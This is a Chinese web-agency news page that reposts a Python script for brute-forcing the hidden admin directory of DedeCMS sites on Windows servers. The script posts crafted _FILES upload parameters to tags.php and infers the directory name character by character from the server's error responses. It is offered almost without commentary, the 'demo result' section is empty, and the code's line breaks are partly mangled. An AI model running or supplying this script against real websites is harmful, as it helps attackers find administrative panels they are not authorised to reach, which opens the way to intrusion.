感谢您的支持,我们会继续努力的!

潍坊谷尼软件技术服务有限公司 潍坊谷尼软件技术服务有限公司

2021-02-22
WIN服务器爆破DEDECMS后台目录

当前位置:首页 > 资讯 > 网络安全 > WIN服务器爆破DEDECMS后台目录

WIN服务器爆破DEDECMS后台目录

发布日期:2021-02-22 10:08:33

游览量:89

作者:谷尼软件



利用脚本python:

#!/usr/bin/env python'''/*
    * author = Mochazz
    * team   = 红日安全团队
    * env    = pyton3
    *
    */
'''import requestsimport itertools
characters = "abcdefghijklmnopqrstuvwxyz0123456789_!#"back_dir = ""flag = 0url = "http://192.168.1.9/tags.php"data = {    "_FILES[mochazz][tmp_name]" : "./{p}<</images/adminico.gif",    "_FILES[mochazz][name]" : 0,    "_FILES[mochazz][size]" : 0,    "_FILES[mochazz][type]" : "image/gif"}for num in range(1,7):    if flag:        break
    for pre in itertools.permutations(characters,num):
        pre = ''.join(list(pre))
        data["_FILES[mochazz][tmp_name]"] = data["_FILES[mochazz][tmp_name]"].format(p=pre)
        print("testing",pre)
        r = requests.post(url,data=data)        if "Upload filetype not allow !" not in r.text and r.status_code == 200:
            flag = 1
            back_dir = pre
            data["_FILES[mochazz][tmp_name]"] = "./{p}<</images/adminico.gif"
            break
        else:
            data["_FILES[mochazz][tmp_name]"] = "./{p}<</images/adminico.gif"print("[+] 前缀为:",back_dir)
flag = 0for i in range(30):    if flag:        break
    for ch in characters:        if ch == characters[-1]:
            flag = 1
            break
        data["_FILES[mochazz][tmp_name]"] = data["_FILES[mochazz][tmp_name]"].format(p=back_dir+ch)
        r = requests.post(url, data=data)        if "Upload filetype not allow !" not in r.text and r.status_code == 200:
            back_dir += ch
            print("[+] ",back_dir)
            data["_FILES[mochazz][tmp_name]"] = "./{p}<</images/adminico.gif"
            break
        else:
            data["_FILES[mochazz][tmp_name]"] = "./{p}<</images/adminico.gif"print("后台地址为:",back_dir)

 

演示结果:


潍坊谷尼软件技术服务有限公司17年行业经验、服务企业5000家,知名企业近160家。谷尼信天翁是山东网站制作机构,是山东企业"互联网+";"移动营销"品牌。执行供给侧改革的网络企业。咨询热线:13188831521
TAG标签:WIN服务器 , DEDECMS后台目录 ,
未注明作者或来源均属原创文章,转载请注明:转自 谷尼软件

推荐